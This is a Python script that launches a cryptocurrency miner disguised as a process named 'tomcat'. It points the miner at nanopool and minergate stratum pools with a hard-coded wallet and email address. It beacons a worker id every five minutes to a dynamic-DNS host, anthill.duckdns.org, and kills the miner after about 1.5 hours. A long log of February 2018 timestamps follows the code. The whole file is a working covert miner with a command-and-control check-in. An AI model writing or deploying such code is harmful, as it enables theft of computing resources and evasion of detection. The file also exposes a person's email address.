import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:36:05.964343
#2018-02-17 16:21:06.993017
#2018-02-17 18:10:06.528087
#2018-02-17 19:57:07.300215
#2018-02-17 21:45:04.878355
#2018-02-17 23:29:01.689172
#2018-02-18 01:18:07.066718
#2018-02-18 03:05:03.751050
#2018-02-18 04:54:01.832694
#2018-02-18 06:47:03.782076
#2018-02-18 08:37:07.292593
#2018-02-18 10:23:05.030639
#2018-02-18 12:09:03.975086
#2018-02-18 13:54:04.691263
#2018-02-18 15:44:06.567423
#2018-02-18 17:34:06.825967
#2018-02-18 19:22:04.811831
#2018-02-18 21:07:05.013925
#2018-02-18 22:54:06.875194
#2018-02-19 00:42:07.052544
#2018-02-19 02:28:05.311741
#2018-02-19 04:15:08.150321
#2018-02-19 06:02:01.683775
#2018-02-19 07:49:04.924094
#2018-02-19 09:39:06.991421
#2018-02-19 11:29:05.485109
#2018-02-19 13:16:08.194451
#2018-02-19 15:05:09.985791
#2018-02-19 16:53:01.409916
#2018-02-19 18:40:08.173379
#2018-02-19 20:26:07.113024
#2018-02-19 22:14:07.688260
#2018-02-20 00:00:10.772361
#2018-02-20 01:47:06.762723
#2018-02-20 03:37:01.663952
#2018-02-20 05:24:05.835328
#2018-02-20 07:08:02.039511
#2018-02-20 08:53:07.022208
#2018-02-20 10:37:01.523600
#2018-02-20 12:23:07.137755
#2018-02-20 14:09:07.310083
#2018-02-20 15:52:08.385793
#2018-02-20 17:40:09.388547
#2018-02-20 19:31:05.979961
#2018-02-20 21:20:01.256413
#2018-02-20 23:04:05.670404
#2018-02-21 00:49:07.027984
#2018-02-21 02:35:07.524936
#2018-02-21 04:22:06.392377
#2018-02-21 06:08:04.804610
#2018-02-21 07:55:08.297991
#2018-02-21 09:41:01.990771
#2018-02-21 11:29:06.196520
#2018-02-21 13:18:06.388311
#2018-02-21 15:05:06.787387
#2018-02-21 16:55:02.992491
#2018-02-21 18:45:01.387521
#2018-02-21 20:40:01.383712
#2018-02-21 22:25:01.812678
#2018-02-22 00:15:06.780345
#2018-02-22 02:03:06.983814
#2018-02-22 03:49:07.914740
#2018-02-22 05:36:03.601924
#2018-02-22 07:21:07.693371
#2018-02-22 09:09:04.585905
#2018-02-22 10:56:08.206556
#2018-02-22 12:43:07.432364
#2018-02-22 14:30:12.609195
#2018-02-22 16:16:06.845699
#2018-02-22 18:04:01.509183
#2018-02-22 19:53:04.439778
#2018-02-22 21:41:09.402219
#2018-02-22 23:29:03.796698
#2018-02-23 01:17:05.539225
#2018-02-23 03:03:02.887775
#2018-02-23 04:51:01.233880
#2018-02-23 06:37:05.946149
#2018-02-23 08:26:05.885594
#2018-02-23 10:41:05.164518
#2018-02-23 12:39:01.762795
#2018-02-23 14:24:04.996404
#2018-02-23 16:15:08.690587
#2018-02-23 18:02:05.127610
#2018-02-23 19:47:05.928606
#2018-02-23 21:31:01.583139
#2018-02-23 23:19:01.483937
#2018-02-24 01:17:07.502466
#2018-02-24 03:08:04.709208
#2018-02-24 04:54:06.812339
#2018-02-24 06:39:01.769158
#2018-02-24 08:28:01.772451
#2018-02-24 10:16:01.572479
#2018-02-24 12:11:07.831928
#2018-02-24 13:57:07.033661
#2018-02-24 15:48:05.053552
#2018-02-24 17:42:03.984660
#2018-02-24 19:26:04.174166
#2018-02-24 21:16:02.096629
#2018-02-24 23:53:03.626551
#2018-02-25 03:46:04.371823
#2018-02-25 07:31:01.182663